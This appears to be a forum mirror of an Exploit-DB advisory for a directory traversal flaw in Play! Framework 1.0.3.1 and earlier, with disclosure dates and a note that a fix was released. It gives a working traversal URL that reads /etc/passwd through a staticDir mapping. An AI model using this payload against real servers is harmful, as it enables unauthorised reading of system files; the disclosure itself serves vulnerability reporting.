- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14602
- Проверка EDB
-
- Пройдено
- Автор
- KRIPTHOR
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- null
- Дата публикации
- 2010-08-10
Код:
Exploit Title: Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability
Date: July 24, 2010
Author: kripthor
Software Link: http://www.playframework.org/
Version: Play! Framework <= 1.0.3.1
Tested on: Ubuntu 10
CVE : N/A
Notes: 28/07/2010 at 14:03 - Developer contacted
28/07/2010 at 15:04 - Fix released
10/08/2010 at 17:00 - Exploit published
References: www.playframework.com
An attacker can download any file that the owner of the Play! process can read.
Simply browse to:
http://127.0.0.1:9000/public/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
The '/public' directory must be a directory with a 'staticDir' mapping in the 'conf/routes' configuration file.
Typically an images or css directory on the server.- Источник
- www.exploit-db.com
